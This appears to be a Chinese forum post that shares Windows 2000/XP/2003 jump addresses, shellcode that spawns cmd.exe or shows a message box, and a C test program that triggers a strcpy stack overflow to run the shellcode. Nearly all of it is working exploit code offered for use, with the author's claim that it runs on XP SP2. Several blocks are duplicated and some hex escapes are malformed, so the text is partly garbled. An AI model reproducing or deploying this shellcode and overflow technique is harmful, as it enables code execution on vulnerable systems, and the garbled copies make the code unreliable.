对Windows 2000、XP、2003都通用的具有JMP
EBX功能的地址是0x7ffa1571,通用的具有JMP ESP功能的地址是0x7ffa4512。
EBX功能的地址是0x7ffa1571,通用的具有JMP ESP功能的地址是0x7ffa4512。
弹出cmd.exe的shellcode是
"\x55\x8B\xEC\x50\x50\x50\xB8\x4D\x53\x56\x43\x89\x45"
"\xF4\xB8\x52\x54\x2E\x44\x89\x45\xF8\xC6\x45\xFC"
"\x4C\xC6\x45\xFD\x4C\x8D\x45F4\x50\xBA"
"\x77\x1D\x80\x7C" //Address of LoadLibraryA in WinXPSP2
"\xFF\xD2\x55\x8B\xEC\x83\xEC\x0C\xB8\x43\x4D\x44\x2E"
"\x89\x45\xF8\xC6\x45\xFC\x45\xC6\x45\xFD\x58\xC645\xFE"
"\x45\x33\xD2\x88\x55\xFF\x8D\x45\xF8\x50\xB8"
"\xC7\x93\xBF\x77" //Address of system in WinXPSP2
"\xFF\xD0";
"\xF4\xB8\x52\x54\x2E\x44\x89\x45\xF8\xC6\x45\xFC"
"\x4C\xC6\x45\xFD\x4C\x8D\x45F4\x50\xBA"
"\x77\x1D\x80\x7C" //Address of LoadLibraryA in WinXPSP2
"\xFF\xD2\x55\x8B\xEC\x83\xEC\x0C\xB8\x43\x4D\x44\x2E"
"\x89\x45\xF8\xC6\x45\xFC\x45\xC6\x45\xFD\x58\xC645\xFE"
"\x45\x33\xD2\x88\x55\xFF\x8D\x45\xF8\x50\xB8"
"\xC7\x93\xBF\x77" //Address of system in WinXPSP2
"\xFF\xD0";
弹出对话框的shellcode
unsigned char sh4llcode[] =""
"\xE9\xA7\x00\x00\x00\x5A\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B"
"\x70\x1C\xAD\x8B\x40\x08\x50\x52\x6A\x0C\xE8\x2F\x00\x00\x00\x5B"
"\x83\xC3\x0D\x53\xFF\xD0\x83\xC3\x07\x53\x6A\x0B\xE8\x1D\x00\x00"
"\x00\x5B\x83\xC3\x18\x6A\x00\x53\x53\x6A\x00\xFF\xD0\xBA\x0C\x00"
"\x00\x00\x58\x2B\xDA\x53\x52\xE8\x02\x00\x00\x00\xFF\xD0\x8B\xD8"
"\x83\xC0\x3C\x8B\x00\x03\xC3\x80\x38\x50\x75\x49\x8B\x40\x78\x03"
"\xC3\x50\x8B\xC8\x8B\x49\x14\x8B\x40\x20\x03\xC3\x55\x8B\xE8\x33"
"\xD2\x51\x8B\x00\x03\xC3\x8B\xF8\x8B\x74\x24\x14\x8B\x4C\x24\x10"
"\xFC\xF3\xA6\x75\x17\x83\xC4\x04\x8B\x44\x24\x04\x8B\x40\x1C\x03"
"\xC3\xC1\xE2\x02\x03\xC2\x8B\x00\x03\xC3\xEB\x0B\x42\x83\xC5\x04"
"\x8B\xC5\x59\xE2\xCC\x33\xC0\x5D\x59\xC2\x04\x00\xE8\x54\xFF\xFF"
"\xFF\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x73"
"\x65\x72\x33\x32\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41"
"\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"OK"
;
上面两个绝对可以使用 ,我在win xp sp2 vc 6.0 下编译通过 并执行成功
"\xE9\xA7\x00\x00\x00\x5A\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B"
"\x70\x1C\xAD\x8B\x40\x08\x50\x52\x6A\x0C\xE8\x2F\x00\x00\x00\x5B"
"\x83\xC3\x0D\x53\xFF\xD0\x83\xC3\x07\x53\x6A\x0B\xE8\x1D\x00\x00"
"\x00\x5B\x83\xC3\x18\x6A\x00\x53\x53\x6A\x00\xFF\xD0\xBA\x0C\x00"
"\x00\x00\x58\x2B\xDA\x53\x52\xE8\x02\x00\x00\x00\xFF\xD0\x8B\xD8"
"\x83\xC0\x3C\x8B\x00\x03\xC3\x80\x38\x50\x75\x49\x8B\x40\x78\x03"
"\xC3\x50\x8B\xC8\x8B\x49\x14\x8B\x40\x20\x03\xC3\x55\x8B\xE8\x33"
"\xD2\x51\x8B\x00\x03\xC3\x8B\xF8\x8B\x74\x24\x14\x8B\x4C\x24\x10"
"\xFC\xF3\xA6\x75\x17\x83\xC4\x04\x8B\x44\x24\x04\x8B\x40\x1C\x03"
"\xC3\xC1\xE2\x02\x03\xC2\x8B\x00\x03\xC3\xEB\x0B\x42\x83\xC5\x04"
"\x8B\xC5\x59\xE2\xCC\x33\xC0\x5D\x59\xC2\x04\x00\xE8\x54\xFF\xFF"
"\xFF\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x73"
"\x65\x72\x33\x32\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41"
"\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"OK"
;
上面两个绝对可以使用 ,我在win xp sp2 vc 6.0 下编译通过 并执行成功
下面是测试代码
#i nclude "stdio.h"
#i nclude "stdlib.h"
#i nclude "string.h"
#i nclude "windows.h"
char name[]=
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // 0x7ffa4512
"\x55\x8B\xEC\x50\x50\x50\xB8\x4D\x53\x56\x43\x89\x45"
"\xF4\xB8\x52\x54\x2E\x44\x89\x45\xF8\xC6\x45\xFC"
"\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA"
"\x77\x1D\x80\x7C" //Address of LoadLibraryA in WinXPSP2
"\xFF\xD2\x55\x8B\xEC\x83\xEC\x0C\xB8\x43\x4D\x44\x2E"
"\x89\x45\xF8\xC6\x45\xFC\x45\xC6\x45\xFD\x58\xC6\x45\xFE"
"\x45\x33\xD2\x88\x55\xFF\x8D\x45\xF8\x50\xB8"
"\xC7\x93\xBF\x77" //Address of system in WinXPSP2
"\xFF\xD0";
#i nclude "stdlib.h"
#i nclude "string.h"
#i nclude "windows.h"
char name[]=
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // 0x7ffa4512
"\x55\x8B\xEC\x50\x50\x50\xB8\x4D\x53\x56\x43\x89\x45"
"\xF4\xB8\x52\x54\x2E\x44\x89\x45\xF8\xC6\x45\xFC"
"\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA"
"\x77\x1D\x80\x7C" //Address of LoadLibraryA in WinXPSP2
"\xFF\xD2\x55\x8B\xEC\x83\xEC\x0C\xB8\x43\x4D\x44\x2E"
"\x89\x45\xF8\xC6\x45\xFC\x45\xC6\x45\xFD\x58\xC6\x45\xFE"
"\x45\x33\xD2\x88\x55\xFF\x8D\x45\xF8\x50\xB8"
"\xC7\x93\xBF\x77" //Address of system in WinXPSP2
"\xFF\xD0";
int overflow(char *str){
char buf[8];
strcpy(buf,str);
return 1;
}
char buf[8];
strcpy(buf,str);
return 1;
}
int main(){
int i;
overflow(name);
return 0;
}